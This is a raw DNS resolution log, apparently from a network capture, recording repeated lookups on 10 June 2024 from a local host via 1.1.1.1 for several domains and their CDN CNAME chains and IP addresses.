                                                                                                                                                          Jun 10, 2024 00:40:53.359597921 CEST1.1.1.1192.168.2.50x33a0No error (0)36s0iija.slt.sched.intlscdn.com122.10.255.44A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.490717888 CEST1.1.1.1192.168.2.50xfd6No error (0)8vpfnx.eveday.me8vpfnx.eveday.me.download.ks-cdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.490717888 CEST1.1.1.1192.168.2.50xfd6No error (0)8vpfnx.eveday.me.download.ks-cdn.coml5.gslb.ksyuncdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.490717888 CEST1.1.1.1192.168.2.50xfd6No error (0)l5.gslb.ksyuncdn.com183.61.243.1A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.490717888 CEST1.1.1.1192.168.2.50xfd6No error (0)l5.gslb.ksyuncdn.com218.60.21.6A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.490717888 CEST1.1.1.1192.168.2.50xfd6No error (0)l5.gslb.ksyuncdn.com124.225.141.5A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.490717888 CEST1.1.1.1192.168.2.50xfd6No error (0)l5.gslb.ksyuncdn.com175.6.254.65A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.490717888 CEST1.1.1.1192.168.2.50xfd6No error (0)l5.gslb.ksyuncdn.com118.112.233.9A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.490717888 CEST1.1.1.1192.168.2.50xfd6No error (0)l5.gslb.ksyuncdn.com183.131.56.5A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.490717888 CEST1.1.1.1192.168.2.50xfd6No error (0)l5.gslb.ksyuncdn.com113.16.211.3A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.490717888 CEST1.1.1.1192.168.2.50xfd6No error (0)l5.gslb.ksyuncdn.com42.56.77.10A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.490717888 CEST1.1.1.1192.168.2.50xfd6No error (0)l5.gslb.ksyuncdn.com183.61.168.1A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.579230070 CEST1.1.1.1192.168.2.50x4b2eNo error (0)zb1-hw.qectyoua.comzb1-hw.qectyoua.com.a5caa4d4.cdnhwcgqa21.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.579230070 CEST1.1.1.1192.168.2.50x4b2eNo error (0)zb1-hw.qectyoua.com.a5caa4d4.cdnhwcgqa21.comhcdnw.ovc.sme.cdnhwccmz121.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.615880013 CEST1.1.1.1192.168.2.50x80f5No error (0)zb1-hw.qectyoua.comzb1-hw.qectyoua.com.a5caa4d4.cdnhwcgqa21.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.615880013 CEST1.1.1.1192.168.2.50x80f5No error (0)zb1-hw.qectyoua.com.a5caa4d4.cdnhwcgqa21.comhcdnw.ovc.sme.cdnhwccmz121.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.615880013 CEST1.1.1.1192.168.2.50x80f5No error (0)hcdnw.ovc.sme.cdnhwccmz121.com23.90.149.106A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.615880013 CEST1.1.1.1192.168.2.50x80f5No error (0)hcdnw.ovc.sme.cdnhwccmz121.com90.84.161.22A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.615880013 CEST1.1.1.1192.168.2.50x80f5No error (0)hcdnw.ovc.sme.cdnhwccmz121.com223.121.15.24A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.710810900 CEST1.1.1.1192.168.2.50x4384No error (0)wssa-301.shiwanxin.comwssa-301.shiwanxin.com.cdn20.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.710810900 CEST1.1.1.1192.168.2.50x4384No error (0)wssa-301.shiwanxin.com.cdn20.com163.171.137.177A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.716043949 CEST1.1.1.1192.168.2.50xdcebName error (3)_1886._https.wssa-371.laorrey.comnonenone65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.736375093 CEST1.1.1.1192.168.2.50x3418Name error (3)wssa-371.laorrey.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.829929113 CEST1.1.1.1192.168.2.50x2be1Name error (3)_1186._https.wssa-301.shiwanxin.comnonenone65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.902740955 CEST1.1.1.1192.168.2.50xf291No error (0)8vpfnx.eveday.me8vpfnx.eveday.me.download.ks-cdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.902740955 CEST1.1.1.1192.168.2.50xf291No error (0)8vpfnx.eveday.me.download.ks-cdn.coml5.gslb.ksyuncdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.902740955 CEST1.1.1.1192.168.2.50xf291No error (0)l5.gslb.ksyuncdn.com183.61.243.1A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.902740955 CEST1.1.1.1192.168.2.50xf291No error (0)l5.gslb.ksyuncdn.com218.60.21.6A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.902740955 CEST1.1.1.1192.168.2.50xf291No error (0)l5.gslb.ksyuncdn.com124.225.141.5A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.902740955 CEST1.1.1.1192.168.2.50xf291No error (0)l5.gslb.ksyuncdn.com175.6.254.65A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.902740955 CEST1.1.1.1192.168.2.50xf291No error (0)l5.gslb.ksyuncdn.com118.112.233.9A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.902740955 CEST1.1.1.1192.168.2.50xf291No error (0)l5.gslb.ksyuncdn.com183.131.56.5A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.902740955 CEST1.1.1.1192.168.2.50xf291No error (0)l5.gslb.ksyuncdn.com113.16.211.3A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.902740955 CEST1.1.1.1192.168.2.50xf291No error (0)l5.gslb.ksyuncdn.com42.56.77.10A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.902740955 CEST1.1.1.1192.168.2.50xf291No error (0)l5.gslb.ksyuncdn.com183.61.168.1A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.962393999 CEST1.1.1.1192.168.2.50x235bNo error (0)ocsapi1961.hydqef.com7znfi17mcwot775b.aliyunddos0015.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.962393999 CEST1.1.1.1192.168.2.50x235bNo error (0)7znfi17mcwot775b.aliyunddos0015.comocsapi1961.hydqef.com.w.cdngslb.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.997699976 CEST1.1.1.1192.168.2.50xce94No error (0)ocsapi1961.hydqef.com7znfi17mcwot775b.aliyunddos0015.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.997699976 CEST1.1.1.1192.168.2.50xce94No error (0)7znfi17mcwot775b.aliyunddos0015.comocsapi1961.hydqef.com.w.cdngslb.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.997699976 CEST1.1.1.1192.168.2.50xce94No error (0)ocsapi1961.hydqef.com.w.cdngslb.com163.181.131.226A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.997699976 CEST1.1.1.1192.168.2.50xce94No error (0)ocsapi1961.hydqef.com.w.cdngslb.com47.246.46.242A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.997699976 CEST1.1.1.1192.168.2.50xce94No error (0)ocsapi1961.hydqef.com.w.cdngslb.com163.181.92.226A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.997699976 CEST1.1.1.1192.168.2.50xce94No error (0)ocsapi1961.hydqef.com.w.cdngslb.com163.181.92.241A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.997699976 CEST1.1.1.1192.168.2.50xce94No error (0)ocsapi1961.hydqef.com.w.cdngslb.com163.181.92.243A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.997699976 CEST1.1.1.1192.168.2.50xce94No error (0)ocsapi1961.hydqef.com.w.cdngslb.com163.181.92.245A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.997699976 CEST1.1.1.1192.168.2.50xce94No error (0)ocsapi1961.hydqef.com.w.cdngslb.com163.181.92.246A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.997699976 CEST1.1.1.1192.168.2.50xce94No error (0)ocsapi1961.hydqef.com.w.cdngslb.com163.181.92.249A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.997699976 CEST1.1.1.1192.168.2.50xce94No error (0)ocsapi1961.hydqef.com.w.cdngslb.com163.181.92.250A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.997699976 CEST1.1.1.1192.168.2.50xce94No error (0)ocsapi1961.hydqef.com.w.cdngslb.com163.181.92.225A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:54.020806074 CEST1.1.1.1192.168.2.50x25eNo error (0)ocsapi-lc.tingmeikj.comjh03-site-18.cdn-ng.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:54.020806074 CEST1.1.1.1192.168.2.50x25eNo error (0)jh03-site-18.cdn-ng.net103.117.134.21A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:54.131843090 CEST1.1.1.1192.168.2.50x53bcNo error (0)wns732.cc202.61.87.219A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:54.131843090 CEST1.1.1.1192.168.2.50x53bcNo error (0)wns732.cc202.61.87.224A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:54.243541002 CEST1.1.1.1192.168.2.50xe39No error (0)ocsapi-lc.tingmeikj.comjh03-site-18.cdn-ng.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:54.810350895 CEST1.1.1.1192.168.2.50x8d07Name error (3)wssa-371.laorrey.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:54.813899040 CEST1.1.1.1192.168.2.50x309dName error (3)_1886._https.wssa-371.laorrey.comnonenone65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:54.843398094 CEST1.1.1.1192.168.2.50x355eName error (3)wssa-371.laorrey.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:54.936084986 CEST1.1.1.1192.168.2.50x1a8bNo error (0)ocsapi-lc.tingmeikj.comjh03-site-18.cdn-ng.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:55.612329960 CEST1.1.1.1192.168.2.50x4b81No error (0)zb1-hw.qectyoua.comzb1-hw.qectyoua.com.a5caa4d4.cdnhwcgqa21.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:55.612329960 CEST1.1.1.1192.168.2.50x4b81No error (0)zb1-hw.qectyoua.com.a5caa4d4.cdnhwcgqa21.comhcdnw.ovc.sme.cdnhwccmz121.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:55.612329960 CEST1.1.1.1192.168.2.50x4b81No error (0)hcdnw.ovc.sme.cdnhwccmz121.com90.84.161.22A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:55.612329960 CEST1.1.1.1192.168.2.50x4b81No error (0)hcdnw.ovc.sme.cdnhwccmz121.com223.121.15.24A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:55.612329960 CEST1.1.1.1192.168.2.50x4b81No error (0)hcdnw.ovc.sme.cdnhwccmz121.com23.90.149.106A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:55.621056080 CEST1.1.1.1192.168.2.50x9782No error (0)zb-hw.czwygs.comzb-hw.czwygs.com.a5caa4d4.cdnhwcgqa21.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:55.621056080 CEST1.1.1.1192.168.2.50x9782No error (0)zb-hw.czwygs.com.a5caa4d4.cdnhwcgqa21.comhcdnw.ovc.sme.cdnhwccmz121.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:55.621056080 CEST1.1.1.1192.168.2.50x9782No error (0)hcdnw.ovc.sme.cdnhwccmz121.com23.90.149.106A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:55.621056080 CEST1.1.1.1192.168.2.50x9782No error (0)hcdnw.ovc.sme.cdnhwccmz121.com90.84.161.22A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:55.621056080 CEST1.1.1.1192.168.2.50x9782No error (0)hcdnw.ovc.sme.cdnhwccmz121.com223.121.15.24A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:55.793442011 CEST1.1.1.1192.168.2.50x86eNo error (0)zb-qq.gzjqwlkj.comzb-qq.gzjqwlkj.com.cdn.dnsv1.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:55.793442011 CEST1.1.1.1192.168.2.50x86eNo error (0)zb-qq.gzjqwlkj.com.cdn.dnsv1.com36s0iija.slt.sched.intlscdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:55.841768980 CEST1.1.1.1192.168.2.50xa762No error (0)zb-qq.gzjqwlkj.comzb-qq.gzjqwlkj.com.cdn.dnsv1.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:55.841768980 CEST1.1.1.1192.168.2.50xa762No error (0)zb-qq.gzjqwlkj.com.cdn.dnsv1.com36s0iija.slt.sched.intlscdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:55.841768980 CEST1.1.1.1192.168.2.50xa762No error (0)36s0iija.slt.sched.intlscdn.com54.150.37.130A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:55.841768980 CEST1.1.1.1192.168.2.50xa762No error (0)36s0iija.slt.sched.intlscdn.com52.220.25.48A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:55.841768980 CEST1.1.1.1192.168.2.50xa762No error (0)36s0iija.slt.sched.intlscdn.com43.152.14.32A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:55.841768980 CEST1.1.1.1192.168.2.50xa762No error (0)36s0iija.slt.sched.intlscdn.com52.76.116.62A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:55.841768980 CEST1.1.1.1192.168.2.50xa762No error (0)36s0iija.slt.sched.intlscdn.com43.152.25.102A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:55.841768980 CEST1.1.1.1192.168.2.50xa762No error (0)36s0iija.slt.sched.intlscdn.com15.188.236.70A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:55.841768980 CEST1.1.1.1192.168.2.50xa762No error (0)36s0iija.slt.sched.intlscdn.com129.227.190.50A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:55.841768980 CEST1.1.1.1192.168.2.50xa762No error (0)36s0iija.slt.sched.intlscdn.com211.152.148.88A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:55.841768980 CEST1.1.1.1192.168.2.50xa762No error (0)36s0iija.slt.sched.intlscdn.com43.132.64.28A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:55.841768980 CEST1.1.1.1192.168.2.50xa762No error (0)36s0iija.slt.sched.intlscdn.com43.152.23.34A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:55.841768980 CEST1.1.1.1192.168.2.50xa762No error (0)36s0iija.slt.sched.intlscdn.com122.10.255.44A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:55.841768980 CEST1.1.1.1192.168.2.50xa762No error (0)36s0iija.slt.sched.intlscdn.com43.201.120.160A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:55.841768980 CEST1.1.1.1192.168.2.50xa762No error (0)36s0iija.slt.sched.intlscdn.com101.33.17.55A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:55.841768980 CEST1.1.1.1192.168.2.50xa762No error (0)36s0iija.slt.sched.intlscdn.com211.152.148.109A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:55.841768980 CEST1.1.1.1192.168.2.50xa762No error (0)36s0iija.slt.sched.intlscdn.com101.33.24.11A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:55.963252068 CEST1.1.1.1192.168.2.50x2362No error (0)zb1-hw.qectyoua.comzb1-hw.qectyoua.com.a5caa4d4.cdnhwcgqa21.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:55.963252068 CEST1.1.1.1192.168.2.50x2362No error (0)zb1-hw.qectyoua.com.a5caa4d4.cdnhwcgqa21.comhcdnw.ovc.sme.cdnhwccmz121.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:56.024990082 CEST1.1.1.1192.168.2.50xd602No error (0)js326.cc202.61.87.224A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:56.024990082 CEST1.1.1.1192.168.2.50xd602No error (0)js326.cc202.61.87.219A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:56.607887030 CEST1.1.1.1192.168.2.50xd875No error (0)zb-hw.czwygs.comzb-hw.czwygs.com.a5caa4d4.cdnhwcgqa21.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:56.607887030 CEST1.1.1.1192.168.2.50xd875No error (0)zb-hw.czwygs.com.a5caa4d4.cdnhwcgqa21.comhcdnw.ovc.sme.cdnhwccmz121.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:57.359144926 CEST1.1.1.1192.168.2.50xcfc3Name error (3)_1886._https.wssa-371.laorrey.comnonenone65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:57.368210077 CEST1.1.1.1192.168.2.50x7912Name error (3)wssa-371.laorrey.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:57.791275978 CEST1.1.1.1192.168.2.50xc32bNo error (0)ocsapi1961.hydqef.com7znfi17mcwot775b.aliyunddos0015.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:57.791275978 CEST1.1.1.1192.168.2.50xc32bNo error (0)7znfi17mcwot775b.aliyunddos0015.comocsapi1961.hydqef.com.w.cdngslb.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:57.792701960 CEST1.1.1.1192.168.2.50x6749Name error (3)_1186._https.wssa-301.shiwanxin.comnonenone65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:57.811067104 CEST1.1.1.1192.168.2.50xe404No error (0)wssa-301.shiwanxin.comwssa-301.shiwanxin.com.cdn20.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:57.811067104 CEST1.1.1.1192.168.2.50xe404No error (0)wssa-301.shiwanxin.com.cdn20.com163.171.137.177A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:57.818763018 CEST1.1.1.1192.168.2.50xb2f5No error (0)zb1-hw.qectyoua.comzb1-hw.qectyoua.com.a5caa4d4.cdnhwcgqa21.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:57.818763018 CEST1.1.1.1192.168.2.50xb2f5No error (0)zb1-hw.qectyoua.com.a5caa4d4.cdnhwcgqa21.comhcdnw.ovc.sme.cdnhwccmz121.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:57.818763018 CEST1.1.1.1192.168.2.50xb2f5No error (0)hcdnw.ovc.sme.cdnhwccmz121.com90.84.161.22A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:57.818763018 CEST1.1.1.1192.168.2.50xb2f5No error (0)hcdnw.ovc.sme.cdnhwccmz121.com223.121.15.24A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:57.818763018 CEST1.1.1.1192.168.2.50xb2f5No error (0)hcdnw.ovc.sme.cdnhwccmz121.com23.90.149.106A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:57.830849886 CEST1.1.1.1192.168.2.50x6531Name error (3)_1886._https.wssa-371.laorrey.comnonenone65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:57.951313019 CEST1.1.1.1192.168.2.50x8dcbName error (3)wssa-371.laorrey.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:58.180177927 CEST1.1.1.1192.168.2.50xe715No error (0)zb-hw.czwygs.comzb-hw.czwygs.com.a5caa4d4.cdnhwcgqa21.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:58.180177927 CEST1.1.1.1192.168.2.50xe715No error (0)zb-hw.czwygs.com.a5caa4d4.cdnhwcgqa21.comhcdnw.ovc.sme.cdnhwccmz121.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:58.180177927 CEST1.1.1.1192.168.2.50xe715No error (0)hcdnw.ovc.sme.cdnhwccmz121.com23.90.149.106A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:58.180177927 CEST1.1.1.1192.168.2.50xe715No error (0)hcdnw.ovc.sme.cdnhwccmz121.com90.84.161.22A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:58.180177927 CEST1.1.1.1192.168.2.50xe715No error (0)hcdnw.ovc.sme.cdnhwccmz121.com223.121.15.24A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:58.200212002 CEST1.1.1.1192.168.2.50x8366No error (0)ocsapi1961.hydqef.com7znfi17mcwot775b.aliyunddos0015.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:58.200212002 CEST1.1.1.1192.168.2.50x8366No error (0)7znfi17mcwot775b.aliyunddos0015.comocsapi1961.hydqef.com.w.cdngslb.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:58.200212002 CEST1.1.1.1192.168.2.50x8366No error (0)ocsapi1961.hydqef.com.w.cdngslb.com163.181.92.226A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:58.200212002 CEST1.1.1.1192.168.2.50x8366No error (0)ocsapi1961.hydqef.com.w.cdngslb.com163.181.131.226A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:58.200212002 CEST1.1.1.1192.168.2.50x8366No error (0)ocsapi1961.hydqef.com.w.cdngslb.com47.246.46.222A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:58.200212002 CEST1.1.1.1192.168.2.50x8366No error (0)ocsapi1961.hydqef.com.w.cdngslb.com163.181.92.241A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:58.200212002 CEST1.1.1.1192.168.2.50x8366No error (0)ocsapi1961.hydqef.com.w.cdngslb.com163.181.92.243A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:58.200212002 CEST1.1.1.1192.168.2.50x8366No error (0)ocsapi1961.hydqef.com.w.cdngslb.com163.181.92.245A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:58.200212002 CEST1.1.1.1192.168.2.50x8366No error (0)ocsapi1961.hydqef.com.w.cdngslb.com163.181.92.246A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:58.200212002 CEST1.1.1.1192.168.2.50x8366No error (0)ocsapi1961.hydqef.com.w.cdngslb.com163.181.92.249A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:58.200212002 CEST1.1.1.1192.168.2.50x8366No error (0)ocsapi1961.hydqef.com.w.cdngslb.com163.181.92.250A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:58.200212002 CEST1.1.1.1192.168.2.50x8366No error (0)ocsapi1961.hydqef.com.w.cdngslb.com163.181.92.225A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:58.263932943 CEST1.1.1.1192.168.2.50x6f20No error (0)zb-qq.gzjqwlkj.comzb-qq.gzjqwlkj.com.cdn.dnsv1.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:58.263932943 CEST1.1.1.1192.168.2.50x6f20No error (0)zb-qq.gzjqwlkj.com.cdn.dnsv1.com36s0iija.slt.sched.intlscdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:58.263932943 CEST1.1.1.1192.168.2.50x6f20No error (0)36s0iija.slt.sched.intlscdn.com211.152.148.88A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:58.263932943 CEST1.1.1.1192.168.2.50x6f20No error (0)36s0iija.slt.sched.intlscdn.com54.150.37.130A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:58.263932943 CEST1.1.1.1192.168.2.50x6f20No error (0)36s0iija.slt.sched.intlscdn.com43.152.25.102A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:58.263932943 CEST1.1.1.1192.168.2.50x6f20No error (0)36s0iija.slt.sched.intlscdn.com43.152.23.34A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:58.263932943 CEST1.1.1.1192.168.2.50x6f20No error (0)36s0iija.slt.sched.intlscdn.com101.33.24.11A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:58.263932943 CEST1.1.1.1192.168.2.50x6f20No error (0)36s0iija.slt.sched.intlscdn.com52.76.116.62A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:58.263932943 CEST1.1.1.1192.168.2.50x6f20No error (0)36s0iija.slt.sched.intlscdn.com15.188.236.70A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:58.263932943 CEST1.1.1.1192.168.2.50x6f20No error (0)36s0iija.slt.sched.intlscdn.com43.152.14.32A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:58.263932943 CEST1.1.1.1192.168.2.50x6f20No error (0)36s0iija.slt.sched.intlscdn.com211.152.148.109A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:58.263932943 CEST1.1.1.1192.168.2.50x6f20No error (0)36s0iija.slt.sched.intlscdn.com101.33.17.55A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:58.263932943 CEST1.1.1.1192.168.2.50x6f20No error (0)36s0iija.slt.sched.intlscdn.com129.227.190.50A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:58.263932943 CEST1.1.1.1192.168.2.50x6f20No error (0)36s0iija.slt.sched.intlscdn.com122.10.255.44A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:58.263932943 CEST1.1.1.1192.168.2.50x6f20No error (0)36s0iija.slt.sched.intlscdn.com52.220.25.48A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:58.263932943 CEST1.1.1.1192.168.2.50x6f20No error (0)36s0iija.slt.sched.intlscdn.com43.201.120.160A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:58.263932943 CEST1.1.1.1192.168.2.50x6f20No error (0)36s0iija.slt.sched.intlscdn.com43.132.64.28A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:58.366262913 CEST1.1.1.1192.168.2.50x7ed5No error (0)zb-qq.gzjqwlkj.comzb-qq.gzjqwlkj.com.cdn.dnsv1.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:58.366262913 CEST1.1.1.1192.168.2.50x7ed5No error (0)zb-qq.gzjqwlkj.com.cdn.dnsv1.com36s0iija.slt.sched.intlscdn.comCNAME (Canonical name)IN (0x0001)false
